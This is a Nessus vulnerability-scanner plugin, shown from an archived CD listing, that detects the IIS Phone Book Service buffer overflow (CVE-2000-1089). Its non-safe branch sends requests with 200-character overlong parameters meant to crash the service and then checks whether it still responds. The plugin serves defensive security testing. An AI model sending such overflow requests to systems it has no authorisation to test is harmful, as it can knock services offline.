home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phonebook.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  115 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10564);
  10.  script_bugtraq_id(2048);
  11.  script_version ("$Revision: 1.19 $");
  12.  script_cve_id("CVE-2000-1089");
  13.  
  14.  name["english"] = "IIS phonebook";
  15.  name["francais"] = "phonebook";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. The CGI /pbserver/pbserver.dll is subject to a buffer
  20. overflow attack that allows an attacker to execute
  21. arbitrary commands on this host.
  22.  
  23. Solution : See http://www.microsoft.com/technet/security/bulletin/ms00-094.mspx
  24. Risk factor : High";
  25.  
  26.  
  27.  desc["francais"] = "
  28. Le CGI /pbserver/pbserver.dll est vulnΘrable α une attaque
  29. par dΘpassement de buffer qui permet α un pirate
  30. d'executer des commandes arbitraires sur ce systΦme.
  31.  
  32. Solution : Cf http://www.microsoft.com/technet/security/bulletin/ms00-094.mspx
  33. Facteur de risque : ElevΘ";
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "Determines whether phonebook server is installed";
  38.  summary["francais"] = "Determines si le serveur phonebook est installΘ";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_MIXED_ATTACK); # mixed
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl");
  51.  script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58. include("http_func.inc");
  59. include("http_keepalive.inc");
  60. port = get_http_port(default:80);
  61.  
  62. if(safe_checks())
  63. {
  64.  res = is_cgi_installed_ka(item:"/pbserver/pbserver.dll", port:port);
  65.  if(res)
  66.  {
  67.   alrt = 
  68. "The CGI /pbserver/pbserver.dll is subject to a buffer
  69. overflow attack that allows an attacker to execute
  70. arbitrary commands on this host.
  71.  
  72. *** Nessus reports this vulnerability using only
  73. *** information that was gathered. Use caution
  74. *** when testing without safe checks enabled.
  75.  
  76. Solution : See http://www.microsoft.com/technet/security/bulletin/ms00-094.mspx
  77. Risk factor : High";
  78.  security_hole(port:port, data:alrt);
  79.  }
  80.  exit(0);
  81. }
  82.  
  83.  
  84.  
  85.  
  86. if(get_port_state(port))
  87. {
  88.   soc = http_open_socket(port);
  89.   if(!soc)exit(0);
  90.  
  91.   req = http_get(item:"/pbserver/pbserver.dll", port:port);
  92.   send(socket:soc, data:req);
  93.   r = http_recv(socket:soc);
  94.   http_close_socket(soc);
  95.   if("Bad Request" >< r)
  96.   {
  97.     soc = http_open_socket(port);
  98.     req = http_get(item:string("/pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=", 
  99.                        crap(200), 
  100.                    "&PBVer=0&PB=",
  101.                     crap(200)), port:port);
  102.                 
  103.     send(socket:soc, data:req);
  104.     r = http_recv(socket:soc);
  105.     http_close_socket(soc);
  106.  
  107.     soc = http_open_socket(port);
  108.     req = http_get(item:"/pbserver/pbserver.dll", port:port);
  109.     send(socket:soc, data:req);
  110.     r = http_recv(socket:soc);
  111.     http_close_socket(soc);
  112.     if(!r)security_hole(port);
  113.   }
  114. }
  115.